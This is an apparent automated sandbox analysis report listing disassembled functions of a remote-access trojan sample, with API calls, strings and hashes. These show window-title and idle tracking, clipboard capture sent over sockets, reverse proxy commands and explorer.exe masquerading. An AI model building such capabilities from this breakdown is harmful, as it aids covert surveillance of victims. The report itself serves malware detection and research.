                                                              • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                              Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                              • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                              • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                              • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                              Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                              • GetLastError.KERNEL32 ref: 00455D6F
                                                              • __dosmaperr.LIBCMT ref: 00455D76
                                                              • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                              • GetLastError.KERNEL32 ref: 00455D8C
                                                              • __dosmaperr.LIBCMT ref: 00455D95
                                                              • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                              • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                              • GetLastError.KERNEL32 ref: 00455F31
                                                              • __dosmaperr.LIBCMT ref: 00455F38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                              • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                              • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                              • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                              Function 0044ACC9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                              • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                              • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                              • __freea.LIBCMT ref: 0044AEB0
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • __freea.LIBCMT ref: 0044AEB9
                                                              • __freea.LIBCMT ref: 0044AEDE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                              • String ID: PkGNG$tC
                                                              • API String ID: 3864826663-4196309852
                                                              • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                              • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                              • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                              • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                              Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: \&G$\&G$`&G
                                                              • API String ID: 269201875-253610517
                                                              • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                              • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                              • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                              • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                              Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 65535$udp
                                                              • API String ID: 0-1267037602
                                                              • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                              • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                              • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                              • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                              Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                              • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                              • GetForegroundWindow.USER32 ref: 0040AD84
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                              • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                              • API String ID: 911427763-3954389425
                                                              • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                              • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                              • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                              • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                              Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                              • API String ID: 82841172-425784914
                                                              • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                              • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                              • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                              • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                              Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                              • __dosmaperr.LIBCMT ref: 0043A926
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                              • __dosmaperr.LIBCMT ref: 0043A963
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                              • __dosmaperr.LIBCMT ref: 0043A9B7
                                                              • _free.LIBCMT ref: 0043A9C3
                                                              • _free.LIBCMT ref: 0043A9CA
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                              • String ID:
                                                              • API String ID: 2441525078-0
                                                              • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                              • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                              • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                              • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                              Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                              • TranslateMessage.USER32(?), ref: 0040557E
                                                              • DispatchMessageA.USER32(?), ref: 00405589
                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                              • API String ID: 2956720200-749203953
                                                              • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                              • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                              • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                              • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                              Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                              • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                              • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                              • String ID: 0VG$0VG$<$@$Temp
                                                              • API String ID: 1704390241-2575729100
                                                              • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                              • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                              • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                              • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                              Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32 ref: 0041697C
                                                              • EmptyClipboard.USER32 ref: 0041698A
                                                              • CloseClipboard.USER32 ref: 00416990
                                                              • OpenClipboard.USER32 ref: 00416997
                                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                              • String ID: !D@
                                                              • API String ID: 2172192267-604454484
                                                              • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                              • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                              • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                              • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                              Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                              • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                              • CloseHandle.KERNEL32(?), ref: 004134A0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                              • String ID:
                                                              • API String ID: 297527592-0
                                                              • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                              • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                              • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                              • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                              Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                              • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                              • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                              • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                              Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 004481B5
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 004481C1
                                                              • _free.LIBCMT ref: 004481CC
                                                              • _free.LIBCMT ref: 004481D7
                                                              • _free.LIBCMT ref: 004481E2
                                                              • _free.LIBCMT ref: 004481ED
                                                              • _free.LIBCMT ref: 004481F8
                                                              • _free.LIBCMT ref: 00448203
                                                              • _free.LIBCMT ref: 0044820E
                                                              • _free.LIBCMT ref: 0044821C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                              • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                              • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                              • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                              Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Eventinet_ntoa
                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                              • API String ID: 3578746661-3604713145
                                                              • Opcode ID: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                              • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                              • Opcode Fuzzy Hash: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                              • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                              Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                              • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                              • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                              • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                              Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                              • __fassign.LIBCMT ref: 0044B4F9
                                                              • __fassign.LIBCMT ref: 0044B514
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                                              • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID: PkGNG
                                                              • API String ID: 1324828854-263838557
                                                              • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                              • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                              • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                              • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                              Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • Sleep.KERNEL32(00000064), ref: 0041755C
                                                              • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                              • API String ID: 1462127192-2001430897
                                                              • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                              • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                              • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                              • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                              Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe), ref: 004074D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                              • API String ID: 2050909247-4242073005
                                                              • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                              • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                              • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                              • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                              Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strftime.LIBCMT ref: 00401D50
